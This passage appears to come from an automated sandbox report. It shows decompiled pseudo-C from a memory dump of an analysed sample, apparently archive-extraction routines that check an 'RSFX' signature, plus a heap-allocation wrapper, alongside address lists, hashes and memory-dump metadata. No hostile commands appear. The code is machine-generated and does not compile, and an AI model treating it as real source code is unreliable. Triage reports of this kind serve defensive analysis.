																		goto L67;
																	}
																	__eflags = _t128 - 5;
																	if(_t128 == 5) {
																		goto L68;
																	}
																	L60:
																	E00C31E3B(_t199);
																	continue;
																}
																__eflags =  *((char*)(_t199 + 0x6cb5));
																if( *((char*)(_t199 + 0x6cb5)) == 0) {
																	L56:
																	_t138 = 0;
																	__eflags = 0;
																	L57:
																	 *((char*)(_t199 + 0x6cb9)) = _t138;
																	goto L60;
																}
																__eflags =  *((char*)(_t199 + 0x5668));
																if( *((char*)(_t199 + 0x5668)) != 0) {
																	goto L56;
																}
																_t138 = _t166;
																goto L57;
															}
															goto L68;
														}
														__eflags =  *((char*)(_t199 + 0x6cbc));
														if( *((char*)(_t199 + 0x6cbc)) != 0) {
															goto L69;
														}
														goto L51;
													} else {
														L46:
														_t119 = 0;
														L73:
														L74:
														 *[fs:0x0] =  *((intOrPtr*)(_t207 - 0xc));
														return _t119;
													}
												}
												__eflags = _t116;
												if(_t116 != 0) {
													goto L48;
												}
												goto L43;
											}
											__eflags =  *((char*)(_t207 + 8));
											if( *((char*)(_t207 + 8)) == 0) {
												goto L46;
											}
											goto L41;
										}
										__eflags = 0;
										 *((char*)(_t207 - 0xd)) = 0;
										while(1) {
											E00C31E3B(_t199);
											_t143 =  *((intOrPtr*)(_t199 + 0x21dc));
											__eflags = _t143 - _t166;
											if(_t143 == _t166) {
												break;
											}
											__eflags =  *((char*)(_t199 + 0x21e0));
											if( *((char*)(_t199 + 0x21e0)) == 0) {
												L37:
												_t144 = E00C3391A(_t199, _t197);
												__eflags = _t144;
												_t145 = _t144 & 0xffffff00 | _t144 != 0x00000000;
												 *(_t207 - 0xe) = _t145;
												__eflags = _t145 - 1;
												if(_t145 == 1) {
													continue;
												}
												goto L38;
											}
											__eflags = _t143 - 4;
											if(_t143 == 4) {
												break;
											}
											goto L37;
										}
										_t116 = _t166;
										goto L39;
									}
									_t205 = _t199 + 0x21ff;
									_t147 =  *((intOrPtr*)( *_t199 + 0xc))(_t205, _t166);
									__eflags = _t147 - _t166;
									if(_t147 != _t166) {
										goto L46;
									}
									__eflags =  *_t205;
									if( *_t205 != 0) {
										goto L46;
									}
									 *((intOrPtr*)(_t199 + 0x2200)) = 8;
									goto L32;
								}
								E00C3134C(__eflags, 0x3c, _t199 + 0x1e);
								goto L46;
							}
							E00C3159C(_t176);
							goto L46;
						} else {
							goto L6;
						}
						do {
							L6:
							_t190 =  *((intOrPtr*)(_t207 - 0x38)) + _t202;
							__eflags =  *_t190 - 0x52;
							if( *_t190 != 0x52) {
								goto L17;
							}
							_t152 = E00C31D09(_t190, _t110 - _t202);
							__eflags = _t152;
							if(_t152 == 0) {
								L16:
								_t110 =  *(_t207 - 0x14);
								goto L17;
							}
							_t191 =  *((intOrPtr*)(_t207 - 0x18));
							 *(_t199 + 0x6cb0) = _t152;
							__eflags = _t152 - _t166;
							if(_t152 != _t166) {
								L19:
								_t197 =  *_t199;
								_t153 = _t202 + _t191;
								 *(_t199 + 0x6cc0) = _t153;
								 *((intOrPtr*)(_t197 + 0x10))(_t153, 0, 0);
								_t155 =  *(_t199 + 0x6cb0);
								__eflags = _t155 - 2;
								if(_t155 == 2) {
									L21:
									 *((intOrPtr*)( *_t199 + 0xc))(_t199 + 0x21f8, 7);
									goto L22;
								}
								__eflags = _t155 - 3;
								if(_t155 != 3) {
									goto L22;
								}
								goto L21;
							}
							__eflags = _t202;
							if(_t202 <= 0) {
								goto L19;
							}
							__eflags = _t191 - 0x1c;
							if(_t191 >= 0x1c) {
								goto L19;
							}
							__eflags =  *(_t207 - 0x14) - 0x1f;
							if( *(_t207 - 0x14) <= 0x1f) {
								goto L19;
							}
							_t159 =  *((intOrPtr*)(_t207 - 0x38)) - _t191;
							__eflags =  *((char*)(_t159 + 0x1c)) - 0x52;
							if( *((char*)(_t159 + 0x1c)) != 0x52) {
								goto L16;
							}
							__eflags =  *((char*)(_t159 + 0x1d)) - 0x53;
							if( *((char*)(_t159 + 0x1d)) != 0x53) {
								goto L16;
							}
							__eflags =  *((char*)(_t159 + 0x1e)) - 0x46;
							if( *((char*)(_t159 + 0x1e)) != 0x46) {
								goto L16;
							}
							__eflags =  *((char*)(_t159 + 0x1f)) - 0x58;
							if( *((char*)(_t159 + 0x1f)) == 0x58) {
								goto L19;
							}
							goto L16;
							L17:
							_t202 = _t202 + 1;
							__eflags = _t202 - _t110;
						} while (_t202 < _t110);
						goto L22;
					}
					 *(_t199 + 0x6cb0) = _t106;
					_t166 = 1;
					__eflags = _t106 - 1;
					if(_t106 == 1) {
						_t206 =  *_t199;
						_t160 =  *((intOrPtr*)(_t206 + 0x14))(0);
						asm("sbb edx, 0x0");
						 *((intOrPtr*)(_t206 + 0x10))(_t160 - 7, _t197);
					}
					goto L25;
				}
				_t119 = 0;
				goto L74;
			}




































                                            0x00c31973
                                            0x00c31973
                                            0x00c31978
                                            0x00c31982
                                            0x00c31984
                                            0x00c31988
                                            0x00c3198e
                                            0x00c3198f
                                            0x00c31996
                                            0x00c319a3
                                            0x00c319ac
                                            0x00c319b7
                                            0x00c319bc
                                            0x00c319be
                                            0x00c319f4
                                            0x00c319fd
                                            0x00c31a01
                                            0x00c31a07
                                            0x00c31a12
                                            0x00c31a15
                                            0x00c31a1a
                                            0x00c31a1c
                                            0x00c31a1e
                                            0x00c31a21
                                            0x00c31a22
                                            0x00c31a24
                                            0x00c31ab9
                                            0x00c31ab9
                                            0x00c31ac0
                                            0x00c31ac3
                                            0x00c31acf
                                            0x00c31acf
                                            0x00c31acf
                                            0x00c31ad3
                                            0x00c31ad8
                                            0x00c31ad8
                                            0x00c31ade
                                            0x00c31ae1
                                            0x00c31af3
                                            0x00c31af6
                                            0x00c31b24
                                            0x00c31b2e
                                            0x00c31b32
                                            0x00c31b3a
                                            0x00c31b3f
                                            0x00c31b42
                                            0x00c31b44
                                            0x00c31b7d
                                            0x00c31b7d
                                            0x00c31b80
                                            0x00c31b80
                                            0x00c31b86
                                            0x00c31b88
                                            0x00c31b90
                                            0x00c31b90
                                            0x00c31b97
                                            0x00c31b9d
                                            0x00c31b9d
                                            0x00c31b9f
                                            0x00c31ba7
                                            0x00c31ba7
                                            0x00c31bac
                                            0x00c31bb0
                                            0x00c31bbd
                                            0x00c31bbd
                                            0x00c31bc7
                                            0x00c31bcd
                                            0x00c31cc5
                                            0x00c31cc5
                                            0x00c31ccc
                                            0x00c31cd7
                                            0x00c31ce7
                                            0x00c31cec
                                            0x00c31cec
                                            0x00000000
                                            0x00c31cec
                                            0x00c31cce
                                            0x00c31cd5
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c31cd5
                                            0x00c31bd3
                                            0x00c31bda
                                            0x00c31be9
                                            0x00c31bf0
                                            0x00c31bf2
                                            0x00c31bfb
                                            0x00c31c04
                                            0x00c31c0d
                                            0x00c31c16
                                            0x00c31c1f
                                            0x00c31c60
                                            0x00c31c62
                                            0x00c31c67
                                            0x00c31c69
                                            0x00000000
                                            0x00000000
                                            0x00c31c24
                                            0x00c31c2a
                                            0x00c31c2d
                                            0x00c31c4f
                                            0x00c31c52
                                            0x00c31c6d
                                            0x00c31c74
                                            0x00c31c83
                                            0x00c31c83
                                            0x00c31c83
                                            0x00c31c85
                                            0x00c31c85
                                            0x00c31c8b
                                            0x00c31c90
                                            0x00c31c99
                                            0x00c31ca2
                                            0x00c31cab
                                            0x00c31cb9
                                            0x00c31cc2
                                            0x00000000
                                            0x00c31cc2
                                            0x00c31c76
                                            0x00c31c7d
                                            0x00000000
                                            0x00000000
                                            0x00c31c7f
                                            0x00000000
                                            0x00c31c7f
                                            0x00c31c54
                                            0x00c31c57
                                            0x00000000
                                            0x00000000
                                            0x00c31c59
                                            0x00c31c5b
                                            0x00000000
                                            0x00c31c5b
                                            0x00c31c2f
                                            0x00c31c36
                                            0x00c31c45
                                            0x00c31c45
                                            0x00c31c45
                                            0x00c31c47
                                            0x00c31c47
                                            0x00000000
                                            0x00c31c47
                                            0x00c31c38
                                            0x00c31c3f
                                            0x00000000
                                            0x00000000
                                            0x00c31c41
                                            0x00000000
                                            0x00c31c41
                                            0x00000000
                                            0x00c31c6b
                                            0x00c31bdc
                                            0x00c31be3
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c31bb2
                                            0x00c31bb2
                                            0x00c31bb2
                                            0x00c31cee
                                            0x00c31cef
                                            0x00c31cf4
                                            0x00c31cfe
                                            0x00c31cfe
                                            0x00c31bb0
                                            0x00c31b99
                                            0x00c31b9b
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c31b9b
                                            0x00c31b8a
                                            0x00c31b8e
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c31b8e
                                            0x00c31b46
                                            0x00c31b48
                                            0x00c31b4b
                                            0x00c31b4d
                                            0x00c31b52
                                            0x00c31b58
                                            0x00c31b5a
                                            0x00000000
                                            0x00000000
                                            0x00c31b5c
                                            0x00c31b63
                                            0x00c31b6a
                                            0x00c31b6c
                                            0x00c31b71
                                            0x00c31b73
                                            0x00c31b76
                                            0x00c31b79
                                            0x00c31b7b
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c31b7b
                                            0x00c31b65
                                            0x00c31b68
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c31b68
                                            0x00c31bb9
                                            0x00000000
                                            0x00c31bb9
                                            0x00c31afa
                                            0x00c31b04
                                            0x00c31b07
                                            0x00c31b09
                                            0x00000000
                                            0x00000000
                                            0x00c31b0f
                                            0x00c31b12
                                            0x00000000
                                            0x00000000
                                            0x00c31b18
                                            0x00000000
                                            0x00c31b18
                                            0x00c31ae9
                                            0x00000000
                                            0x00c31ae9
                                            0x00c31ac5
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c31a2a
                                            0x00c31a2a
                                            0x00c31a2d
                                            0x00c31a2f
                                            0x00c31a32
                                            0x00000000
                                            0x00000000
                                            0x00c31a38
                                            0x00c31a3d
                                            0x00c31a3f
                                            0x00c31a7a
                                            0x00c31a7a
                                            0x00000000
                                            0x00c31a7a
                                            0x00c31a41
                                            0x00c31a44
                                            0x00c31a4a
                                            0x00c31a4c
                                            0x00c31a84
                                            0x00c31a84
                                            0x00c31a86
                                            0x00c31a90
                                            0x00c31a96
                                            0x00c31a99
                                            0x00c31a9f
                                            0x00c31aa2
                                            0x00c31aa9
                                            0x00c31ab6
                                            0x00000000
                                            0x00c31ab6
                                            0x00c31aa4
                                            0x00c31aa7
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c31aa7
                                            0x00c31a4e
                                            0x00c31a50
                                            0x00000000
                                            0x00000000
                                            0x00c31a52
                                            0x00c31a55
                                            0x00000000
                                            0x00000000
                                            0x00c31a57
                                            0x00c31a5b
                                            0x00000000
                                            0x00000000
                                            0x00c31a60
                                            0x00c31a62
                                            0x00c31a66
                                            0x00000000
                                            0x00000000
                                            0x00c31a68
                                            0x00c31a6c
                                            0x00000000
                                            0x00000000
                                            0x00c31a6e
                                            0x00c31a72
                                            0x00000000
                                            0x00000000
                                            0x00c31a74
                                            0x00c31a78
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c31a7d
                                            0x00c31a7d
                                            0x00c31a7e
                                            0x00c31a7e
                                            0x00000000
                                            0x00c31a82
                                            0x00c319c2
                                            0x00c319c8
                                            0x00c319c9
                                            0x00c319cb
                                            0x00c319d1
                                            0x00c319d7
                                            0x00c319df
                                            0x00c319e4
                                            0x00c319e4
                                            0x00000000
                                            0x00c319cb
                                            0x00c319a5
                                            0x00000000

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: H_prolog
                                            • String ID:
                                            • API String ID: 3519838083-0
                                            • Opcode ID: 1023bae42a54239b9eaee3f59959f42143d61ae09d65ddd2653597ad42bb6493
                                            • Instruction ID: 772593f9fe21f1cefb623485d8249c2fa3657a40840a14b513ef40c753e609b1
                                            • Opcode Fuzzy Hash: 1023bae42a54239b9eaee3f59959f42143d61ae09d65ddd2653597ad42bb6493
                                            • Instruction Fuzzy Hash: 4DB11470B14246AFEB29CF78C484BB9FBE5BF05304F1C4259E865C3281DB31AA64DB91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C381C4, Relevance: 1.6, APIs: 1, Instructions: 110COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 91%
                                            			E00C381C4(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __eflags) {
				void* __esi;
				void* _t47;
				signed int _t50;
				signed int _t51;
				void* _t53;
				signed int _t55;
				signed int _t61;
				intOrPtr _t73;
				signed int _t80;
				intOrPtr _t88;
				void* _t89;
				void* _t91;
				intOrPtr _t93;
				void* _t95;
				void* _t98;

				_t98 = __eflags;
				_t90 = __edi;
				_t88 = __edx;
				_t73 = __ecx;
				E00C4D870(E00C612D2, _t95);
				E00C4D940();
				_t93 = _t73;
				_t1 = _t95 - 0x9d58; // -38232
				E00C3137D(_t1, _t88, __edi, _t98,  *(_t93 + 8));
				 *(_t95 - 4) =  *(_t95 - 4) & 0x00000000;
				_t6 = _t95 - 0x9d58; // -38232
				if(E00C39C0E(_t6, _t93 + 0xf4) != 0) {
					_t7 = _t95 - 0x9d58; // -38232, executed
					_t47 = E00C31973(_t7, _t88, 1); // executed
					if(_t47 != 0) {
						__eflags =  *((char*)(_t95 - 0x3093));
						if( *((char*)(_t95 - 0x3093)) == 0) {
							_push(__edi);
							_t91 = 0;
							__eflags =  *(_t95 - 0x30a3);
							if( *(_t95 - 0x30a3) != 0) {
								_t10 = _t95 - 0x9d3a; // -38202
								_t11 = _t95 - 0x1010; // -2064
								_t61 = E00C3FAB1(_t11, _t10, 0x800);
								__eflags =  *(_t95 - 0x309e);
								while(1) {
									_t17 = _t95 - 0x1010; // -2064
									E00C3B782(_t17, 0x800, (_t61 & 0xffffff00 | __eflags == 0x00000000) & 0x000000ff);
									_t18 = _t95 - 0x2058; // -6232
									E00C36EF9(_t18);
									_push(0);
									_t19 = _t95 - 0x2058; // -6232
									_t20 = _t95 - 0x1010; // -2064
									_t61 = E00C3A1B1(_t18, _t88, __eflags, _t20, _t19);
									__eflags = _t61;
									if(_t61 == 0) {
										break;
									}
									_t91 = _t91 +  *((intOrPtr*)(_t95 - 0x1058));
									asm("adc ebx, [ebp-0x1054]");
									__eflags =  *(_t95 - 0x309e);
								}
								 *((intOrPtr*)(_t93 + 0x98)) =  *((intOrPtr*)(_t93 + 0x98)) + _t91;
								asm("adc [esi+0x9c], ebx");
							}
							_t23 = _t95 - 0x9d58; // -38232
							E00C3835C(_t93, _t88, _t23);
							_t50 =  *(_t93 + 8);
							_t89 = 0x49;
							_pop(_t90);
							_t80 =  *(_t50 + 0x82f2) & 0x0000ffff;
							__eflags = _t80 - 0x54;
							if(_t80 == 0x54) {
								L11:
								 *((char*)(_t50 + 0x61f9)) = 1;
							} else {
								__eflags = _t80 - _t89;
								if(_t80 == _t89) {
									goto L11;
								}
							}
							_t51 =  *(_t93 + 8);
							__eflags =  *((intOrPtr*)(_t51 + 0x82f2)) - _t89;
							if( *((intOrPtr*)(_t51 + 0x82f2)) != _t89) {
								__eflags =  *((char*)(_t51 + 0x61f9));
								_t32 =  *((char*)(_t51 + 0x61f9)) == 0;
								__eflags =  *((char*)(_t51 + 0x61f9)) == 0;
								E00C40FBD((_t51 & 0xffffff00 | _t32) & 0x000000ff, (_t51 & 0xffffff00 | _t32) & 0x000000ff, _t93 + 0xf4);
							}
							_t33 = _t95 - 0x9d58; // -38232
							E00C31E4F(_t33, _t89);
							do {
								_t34 = _t95 - 0x9d58; // -38232
								_t53 = E00C3391A(_t34, _t89);
								_t35 = _t95 - 0xd; // 0x7f3
								_t36 = _t95 - 0x9d58; // -38232
								_t55 = E00C383C0(_t93, _t36, _t53, _t35); // executed
								__eflags = _t55;
							} while (_t55 != 0);
						}
					} else {
						E00C36E03(0xc700e0, 1);
					}
				}
				_t37 = _t95 - 0x9d58; // -38232
				E00C3162D(_t37, _t90, _t93);
				 *[fs:0x0] =  *((intOrPtr*)(_t95 - 0xc));
				return 0;
			}


















                                            0x00c381c4
                                            0x00c381c4
                                            0x00c381c4
                                            0x00c381c4
                                            0x00c381c9
                                            0x00c381d3
                                            0x00c381d9
                                            0x00c381db
                                            0x00c381e4
                                            0x00c381e9
                                            0x00c381f4
                                            0x00c38201
                                            0x00c38209
                                            0x00c3820f
                                            0x00c38216
                                            0x00c38229
                                            0x00c38230
                                            0x00c38237
                                            0x00c3823a
                                            0x00c3823c
                                            0x00c38242
                                            0x00c38249
                                            0x00c38250
                                            0x00c38257
                                            0x00c3825c
                                            0x00c38277
                                            0x00c38283
                                            0x00c3828a
                                            0x00c3828f
                                            0x00c38295
                                            0x00c3829a
                                            0x00c3829c
                                            0x00c382a3
                                            0x00c382aa
                                            0x00c382af
                                            0x00c382b1
                                            0x00000000
                                            0x00000000
                                            0x00c38264
                                            0x00c3826a
                                            0x00c38270
                                            0x00c38270
                                            0x00c382b3
                                            0x00c382b9
                                            0x00c382b9
                                            0x00c382bf
                                            0x00c382c8
                                            0x00c382cd
                                            0x00c382d2
                                            0x00c382d3
                                            0x00c382d4
                                            0x00c382dc
                                            0x00c382df
                                            0x00c382e6
                                            0x00c382e6
                                            0x00c382e1
                                            0x00c382e1
                                            0x00c382e4
                                            0x00000000
                                            0x00000000
                                            0x00c382e4
                                            0x00c382ed
                                            0x00c382f0
                                            0x00c382f7
                                            0x00c382f9
                                            0x00c38307
                                            0x00c38307
                                            0x00c3830e
                                            0x00c3830e
                                            0x00c38313
                                            0x00c38319
                                            0x00c3831e
                                            0x00c3831e
                                            0x00c38324
                                            0x00c38329
                                            0x00c3832e
                                            0x00c38337
                                            0x00c3833c
                                            0x00c3833c
                                            0x00c3831e
                                            0x00c38218
                                            0x00c3821f
                                            0x00c3821f
                                            0x00c38216
                                            0x00c38340
                                            0x00c38346
                                            0x00c38351
                                            0x00c3835b

                                            APIs
                                            • __EH_prolog.LIBCMT ref: 00C381C9
                                              • Part of subcall function 00C3137D: __EH_prolog.LIBCMT ref: 00C31382
                                              • Part of subcall function 00C3137D: new.LIBCMT ref: 00C313FA
                                              • Part of subcall function 00C31973: __EH_prolog.LIBCMT ref: 00C31978
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: H_prolog
                                            • String ID:
                                            • API String ID: 3519838083-0
                                            • Opcode ID: a2acf2e250ebe29ebe20b958a3c9669a099aa8cab8d2f0fb784cb656e2fcd063
                                            • Instruction ID: 16e297c6b2e2d8722f16937fa3ab1c6005cac4b1893bde0216c5e4226030b2e7
                                            • Opcode Fuzzy Hash: a2acf2e250ebe29ebe20b958a3c9669a099aa8cab8d2f0fb784cb656e2fcd063
                                            • Instruction Fuzzy Hash: 90418171960754AADB24EB61C855BEAB3B8AF40700F0400EAF59AA3193DF755FC8EB50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C49EEF, Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 83%
                                            			E00C49EEF(void* __ecx, void* __edx, void* __eflags) {
				void* __edi;
				void* __esi;
				short _t33;
				char _t36;
				void* _t47;
				void* _t50;
				short _t55;
				void* _t57;
				void* _t58;
				short _t60;
				void* _t62;
				intOrPtr _t64;
				void* _t67;

				_t67 = __eflags;
				_t57 = __edx;
				_t47 = __ecx;
				E00C4D870(E00C614E1, _t62);
				_push(_t47);
				E00C4D940();
				_push(_t60);
				_push(_t58);
				 *((intOrPtr*)(_t62 - 0x10)) = _t64;
				 *((intOrPtr*)(_t62 - 4)) = 0;
				E00C3137D(_t62 - 0x7d24, _t57, _t58, _t67, 0); // executed
				 *((char*)(_t62 - 4)) = 1;
				E00C31E9E(_t62 - 0x7d24, _t57, _t62, _t67,  *((intOrPtr*)(_t62 + 0xc)));
				if( *((intOrPtr*)(_t62 - 0x105f)) == 0) {
					 *((intOrPtr*)(_t62 - 0x24)) = 0;
					 *((intOrPtr*)(_t62 - 0x20)) = 0;
					 *((intOrPtr*)(_t62 - 0x1c)) = 0;
					 *((intOrPtr*)(_t62 - 0x18)) = 0;
					 *((char*)(_t62 - 0x14)) = 0;
					 *((char*)(_t62 - 4)) = 2;
					_t50 = _t62 - 0x7d24;
					_t33 = E00C3192E(_t57, _t62 - 0x24);
					__eflags = _t33;
					if(_t33 != 0) {
						_t60 =  *((intOrPtr*)(_t62 - 0x20));
						_t58 = _t60 + _t60;
						_push(_t58 + 2);
						_t55 = E00C52B53(_t50);
						 *((intOrPtr*)( *((intOrPtr*)(_t62 + 0x10)))) = _t55;
						__eflags = _t55;
						if(_t55 != 0) {
							__eflags = 0;
							 *((short*)(_t58 + _t55)) = 0;
							E00C4EA80(_t55,  *((intOrPtr*)(_t62 - 0x24)), _t58);
						} else {
							_t60 = 0;
						}
						 *((intOrPtr*)( *((intOrPtr*)(_t62 + 0x14)))) = _t60;
					}
					E00C315E3(_t62 - 0x24);
					E00C3162D(_t62 - 0x7d24, _t58, _t60); // executed
					_t36 = 1;
				} else {
					E00C3162D(_t62 - 0x7d24, _t58, _t60);
					_t36 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t62 - 0xc));
				return _t36;
			}
















                                            0x00c49eef
                                            0x00c49eef
                                            0x00c49eef
                                            0x00c49ef4
                                            0x00c49ef9
                                            0x00c49eff
                                            0x00c49f05
                                            0x00c49f06
                                            0x00c49f09
                                            0x00c49f13
                                            0x00c49f16
                                            0x00c49f24
                                            0x00c49f28
                                            0x00c49f33
                                            0x00c49f44
                                            0x00c49f47
                                            0x00c49f4a
                                            0x00c49f4d
                                            0x00c49f50
                                            0x00c49f56
                                            0x00c49f5b
                                            0x00c49f61
                                            0x00c49f66
                                            0x00c49f68
                                            0x00c49f6a
                                            0x00c49f6d
                                            0x00c49f73
                                            0x00c49f7a
                                            0x00c49f7f
                                            0x00c49f81
                                            0x00c49f83
                                            0x00c49f89
                                            0x00c49f8c
                                            0x00c49f94
                                            0x00c49f85
                                            0x00c49f85
                                            0x00c49f85
                                            0x00c49f9f
                                            0x00c49f9f
                                            0x00c49fa4
                                            0x00c49faf
                                            0x00c49fb4
                                            0x00c49f35
                                            0x00c49f3b
                                            0x00c49f40
                                            0x00c49f40
                                            0x00c49fbb
                                            0x00c49fc6

                                            APIs
                                            • __EH_prolog.LIBCMT ref: 00C49EF4
                                              • Part of subcall function 00C3137D: __EH_prolog.LIBCMT ref: 00C31382
                                              • Part of subcall function 00C3137D: new.LIBCMT ref: 00C313FA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: H_prolog
                                            • String ID:
                                            • API String ID: 3519838083-0
                                            • Opcode ID: b215b495fe46d1b04504aef5a9f3d448fd12d76a402125e5ef2089dc3422ede2
                                            • Instruction ID: a9e9f0fce406f37cbb75c5b97781db81f80bc4158291a9a90fdac7ae8dfc7193
                                            • Opcode Fuzzy Hash: b215b495fe46d1b04504aef5a9f3d448fd12d76a402125e5ef2089dc3422ede2
                                            • Instruction Fuzzy Hash: 63214C71D042599ECF14DF95D9819EEBBF4FF19314F0404AAE809A7202D7356E0ADB60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C57A8A, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 94%
                                            			E00C57A8A(void* __ecx, long _a4) {
				void* __esi;
				void* _t4;
				void* _t6;
				void* _t7;
				void* _t8;
				long _t9;

				_t7 = __ecx;
				_t9 = _a4;
				if(_t9 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E00C57ECC())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t9 == 0) {
					_t9 = _t9 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0xc90874, 0, _t9); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E00C57906();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E00C56763(_t7, _t8, _t9, __eflags, _t9);
					_pop(_t7);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}









                                            0x00c57a8a
                                            0x00c57a90
                                            0x00c57a96
                                            0x00c57ac8
                                            0x00c57acd
                                            0x00c57ad3
                                            0x00000000
                                            0x00c57ad3
                                            0x00c57a9a
                                            0x00c57a9c
                                            0x00c57a9c
                                            0x00c57ab3
                                            0x00c57abc
                                            0x00c57ac4
                                            0x00000000
                                            0x00000000
                                            0x00c57aa4
                                            0x00c57aa6
                                            0x00000000
                                            0x00000000
                                            0x00c57aa9
                                            0x00c57aae
                                            0x00c57aaf
                                            0x00c57ab1
                                            0x00000000
                                            0x00000000
                                            0x00c57ab1
                                            0x00000000

                                            APIs
                                            • RtlAllocateHeap.NTDLL(00000000,?,?,?,00C52FA6,?,0000015D,?,?,?,?,00C54482,000000FF,00000000,?,?), ref: 00C57ABC
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID:
                                            • API String ID: 1279760036-0
                                            • Opcode ID: c76230a8f4b6573a3a02ba54178b5b0a5ba443b3fbf14357d7adb65f46ce7314
                                            • Instruction ID: 07eba95a830c2889de08bd06b0deafdfd9c6a7e1b62fda633845611adb797b96
                                            • Opcode Fuzzy Hash: c76230a8f4b6573a3a02ba54178b5b0a5ba443b3fbf14357d7adb65f46ce7314
                                            • Instruction Fuzzy Hash: 35E0652D6482216AD63126667D05B5E7A4DEF61BB3F192321FC24960D0CF60CFC8A2ED
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C35A1D, Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 94%
                                            			E00C35A1D(intOrPtr __ecx, void* __eflags) {
				intOrPtr _t25;
				intOrPtr _t34;
				void* _t36;

				_t25 = __ecx;
				E00C4D870(E00C61216, _t36);
				_push(_t25);
				_t34 = _t25;
				 *((intOrPtr*)(_t36 - 0x10)) = _t34;
				E00C3AD1B(_t25); // executed
				_t2 = _t36 - 4;
				 *(_t36 - 4) =  *(_t36 - 4) & 0x00000000;
				E00C3FAE6();
				 *(_t36 - 4) = 1;
				E00C3FAE6();
				 *(_t36 - 4) = 2;
				E00C3FAE6();
				 *(_t36 - 4) = 3;
				E00C3FAE6();
				 *(_t36 - 4) = 4;
				E00C3FAE6();
				 *(_t36 - 4) = 5;
				E00C35C12(_t34,  *_t2);
				 *[fs:0x0] =  *((intOrPtr*)(_t36 - 0xc));
				return _t34;
			}






                                            0x00c35a1d
                                            0x00c35a22
                                            0x00c35a27
                                            0x00c35a29
                                            0x00c35a2b
                                            0x00c35a2e
                                            0x00c35a33
                                            0x00c35a33
                                            0x00c35a3d
                                            0x00c35a48
                                            0x00c35a4c
                                            0x00c35a57
                                            0x00c35a5b
                                            0x00c35a66
                                            0x00c35a6a
                                            0x00c35a75
                                            0x00c35a79
                                            0x00c35a80
                                            0x00c35a84
                                            0x00c35a8f
                                            0x00c35a99

                                            APIs
                                            • __EH_prolog.LIBCMT ref: 00C35A22
